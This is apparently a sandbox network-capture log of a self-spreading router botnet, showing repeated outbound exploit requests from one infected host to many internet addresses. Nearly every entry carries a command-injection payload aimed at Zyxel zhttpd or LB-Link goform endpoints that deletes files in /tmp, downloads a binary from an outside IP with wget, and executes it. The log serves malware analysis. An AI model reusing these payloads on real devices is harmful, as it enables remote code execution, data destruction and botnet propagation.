                                        Mar 31, 2024 09:21:13.820710897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4270192.168.2.2352278110.88.17.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820755959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4271192.168.2.2334818172.129.79.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820806026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4272192.168.2.2358414137.202.207.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820847034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4273192.168.2.2346088209.76.67.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820894003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4274192.168.2.2350868120.57.32.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820954084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4275192.168.2.2351168189.151.107.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.820993900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4276192.168.2.234444298.168.145.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821032047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4277192.168.2.234280836.146.143.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821067095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4278192.168.2.2343634213.104.96.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821120977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4279192.168.2.234344844.54.237.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821152925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4280192.168.2.236082868.185.36.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821202993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4281192.168.2.2341034156.49.27.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821250916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4282192.168.2.236059294.144.216.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821302891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4283192.168.2.2354682219.21.191.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821338892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4284192.168.2.235918041.92.155.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821376085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4285192.168.2.234499642.227.54.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821436882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4286192.168.2.234181892.38.231.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821470022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4287192.168.2.2360402123.208.221.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821502924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4288192.168.2.234671698.128.171.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821535110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4289192.168.2.2332784178.135.130.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821566105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4290192.168.2.2353078155.3.39.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821608067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4291192.168.2.2351856188.161.152.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821651936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4292192.168.2.23473269.113.230.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821690083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4293192.168.2.235608846.83.184.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821738958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4294192.168.2.2345536154.62.177.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821790934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4295192.168.2.2341638134.157.83.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821851969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4296192.168.2.2354812207.7.146.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821902037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4297192.168.2.234904286.22.33.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.821957111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4298192.168.2.2355340130.245.98.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822006941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4299192.168.2.234623294.32.105.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822041035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4300192.168.2.234219032.248.185.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822113991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4301192.168.2.233369647.20.200.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822143078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4302192.168.2.233467024.124.149.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822181940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4303192.168.2.2346736168.157.66.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822232008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4304192.168.2.2341368190.178.250.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822283983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4305192.168.2.2339982181.196.105.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822335958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4306192.168.2.233524896.114.184.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822395086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4307192.168.2.23446964.105.74.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822438955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4308192.168.2.2354644200.155.144.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822475910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4309192.168.2.2350664101.162.178.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.822520971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4310192.168.2.2351802176.177.193.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.828788042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4311192.168.2.234461890.251.158.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.828840017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4312192.168.2.2357372213.153.89.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.829864979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4313192.168.2.2351576118.76.103.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.829951048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4314192.168.2.2345030185.120.215.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.829983950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4315192.168.2.2349172172.126.211.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830043077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4316192.168.2.234303078.135.20.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830116034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4317192.168.2.2350068186.183.200.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830154896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4318192.168.2.2344702155.17.109.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830200911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4319192.168.2.234488459.37.52.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830251932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4320192.168.2.2354978166.244.243.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830317020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4321192.168.2.2336830175.54.229.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830354929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4322192.168.2.235191213.206.17.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830418110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4323192.168.2.235228495.245.208.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830473900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4324192.168.2.2338080191.51.246.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830513000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4325192.168.2.233976838.175.78.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830564976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4326192.168.2.2355358118.157.44.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830629110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4327192.168.2.2347812191.13.127.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830699921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4328192.168.2.2349946150.63.185.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830743074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4329192.168.2.2359232145.123.241.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:13.830804110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4330192.168.2.2340558107.154.245.868080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.165958881 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4331192.168.2.2335934190.105.34.428080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.333041906 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:21:14.634135962 CEST127INHTTP/1.0 302 Redirect
                                        Server: PS HTTP Server
                                        Location: /login.asp
                                        Content-type: text/html
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4332192.168.2.2336378221.204.185.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840131998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4333192.168.2.2352712179.69.91.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:14.840188026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4334192.168.2.2343960173.238.211.250443
                                        TimestampBytes transferredDirectionData
